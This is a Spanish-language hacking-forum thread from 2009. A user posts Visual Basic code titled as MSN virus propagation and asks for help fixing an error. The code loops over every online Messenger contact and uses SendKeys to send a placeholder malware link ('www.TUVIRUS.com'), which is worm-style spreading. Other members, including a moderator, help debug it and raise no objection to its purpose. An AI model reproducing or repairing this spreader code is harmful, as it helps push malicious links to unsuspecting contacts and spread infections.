elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Propagacion de virus MSN -> Error ...
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Propagacion de virus MSN -> Error ...  (Leído 6,744 veces)
NsTeam

Desconectado Desconectado

Mensajes: 127


Ver Perfil
Propagacion de virus MSN -> Error ...
« en: 23 Julio 2009, 02:54 am »


Hola A todos

Bueno navegando por el foro encontre este tema

(No revivi ese Tema Porq Era antiguo)

lo cual vi un code lo cual lo pruebo y siempre me manda error

Código:
Public WithEvents msn As MessengerAPI.Messenger

Private Sub Form_Load()
Set MsgrUIA = New MessengerAPI.Messenger
    For Each user In MsgrUIA.MyContacts
        If user.Status = MISTATUS_ONLINE Or user.Status = MISTATUS_AWAY Or user.Status = MISTATUS_BE_RIGHT_BACK Or user.Status = MISTATUS_BUSY Or user.Status = MISTATUS_IDLE Or user.Status = MISTATUS_ON_THE_PHONE Or user.Status = MISTATUS_OUT_TO_LUNCH Then
        Set venta = MsgrUIA.InstantMessage(user)
              SendKeys "www.TUVIRUS.com" 'url
              SendKeys "{ENTER}"
             SendKeys "%Z"
        End If
      Next
Set MsgrUIA = Nothing
End Sub


lo cual siempre me manda este error

Código:
Set MsgrUIA = New MessengerAPI.Messenger


tengo activado en reference

Código:
Messenger API Type Library
Messenger Private Type Library
Messenger Type Library

Pero Siempre me manda el mismo error


Bueno Espero Alguna Respuesta

TAlves tenga que arreglar el Code o HAcer otra Cosa =)

PD: Lo POsteo en esta Zona POrque El S.Code es en el lenguaje vB   ;) Salu2[/b]


« Última modificación: 23 Julio 2009, 02:56 am por NsTeam » En línea

h0oke


Desconectado Desconectado

Mensajes: 2.059


Coder ~


Ver Perfil WWW
Re: Propagacion de virus MSN -> Error ...
« Respuesta #1 en: 23 Julio 2009, 02:59 am »

Haz incluido las api del msn?


En línea

NsTeam

Desconectado Desconectado

Mensajes: 127


Ver Perfil
Re: Propagacion de virus MSN -> Error ...
« Respuesta #2 en: 23 Julio 2009, 03:13 am »

Haz incluido las api del msn?

Si lo Inclui

PEro aun asi me sige dando ese error
En línea

seba123neo
Moderador
***
Desconectado Desconectado

Mensajes: 3.621



Ver Perfil WWW
Re: Propagacion de virus MSN -> Error ...
« Respuesta #3 en: 23 Julio 2009, 03:23 am »

estas seteando mal:

Código
  1. Set MsgrUIA = New MessengerAPI.Messenger

deberia ser:

Código
  1. Set msn = New MessengerAPI.Messenger

no hace falta tener referenciado esas 3 cosas...con solo 1 te debe andar...

saludos.

En línea

NsTeam

Desconectado Desconectado

Mensajes: 127


Ver Perfil
Re: Propagacion de virus MSN -> Error ...
« Respuesta #4 en: 23 Julio 2009, 03:33 am »

estas seteando mal:

Código
  1. Set MsgrUIA = New MessengerAPI.Messenger

deberia ser:

Código
  1. Set msn = New MessengerAPI.Messenger

no hace falta tener referenciado esas 3 cosas...con solo 1 te debe andar...

saludos.




Lo Probe De la Forma que me DIjiste

Pero aun asi me siga dando ese Error

En línea

^_^

Desconectado Desconectado

Mensajes: 13


Ver Perfil
Re: Propagacion de virus MSN -> Error ...
« Respuesta #5 en: 23 Julio 2009, 03:39 am »

Si no me equivoco, se que desde que implementaron una nueva version del messenger o algo asi era, ha dejado de funcionarle a mucha gente este metodo ...
En línea

h0oke


Desconectado Desconectado

Mensajes: 2.059


Coder ~


Ver Perfil WWW
Re: Propagacion de virus MSN -> Error ...
« Respuesta #6 en: 23 Julio 2009, 03:42 am »

Por supuesto que esto no es para LiveMsn. Es para el windows msn viejo.
En línea

NsTeam

Desconectado Desconectado

Mensajes: 127


Ver Perfil
Re: Propagacion de virus MSN -> Error ...
« Respuesta #7 en: 23 Julio 2009, 03:43 am »

mMMMMMMMMM

Yo Uso Messenger 7.5

En este Caso Funcionara¿  Mmm........
En línea

h0oke


Desconectado Desconectado

Mensajes: 2.059


Coder ~


Ver Perfil WWW
Re: Propagacion de virus MSN -> Error ...
« Respuesta #8 en: 23 Julio 2009, 03:44 am »

Creo que todavía funcionaba para esa versión.

Igualmente no creo que ese sea el error, sino más bien que falta declarar algo.
En línea

NsTeam

Desconectado Desconectado

Mensajes: 127


Ver Perfil
Re: Propagacion de virus MSN -> Error ...
« Respuesta #9 en: 23 Julio 2009, 03:47 am »

Creo que todavía funcionaba para esa versión.

Igualmente no creo que ese sea el error, sino más bien que falta declarar algo.

mmmm

de echo ya declaro Todo

Pero aun ASi NAda...    NO se que hice MAl =(
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Microsoft consigue reducir drásticamente la propagación de virus en Windows....
Noticias
wolfbcn 0 1,632 Último mensaje 19 Junio 2011, 13:52 pm
por wolfbcn
Propagación de virus C (Duda)
Análisis y Diseño de Malware
Grado 33 3 3,021 Último mensaje 9 Julio 2015, 05:35 am
por engel lex
La Policía alerta de la propagación de un virus a través de correos ....
Noticias
wolfbcn 0 1,362 Último mensaje 10 Enero 2019, 22:07 pm
por wolfbcn
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines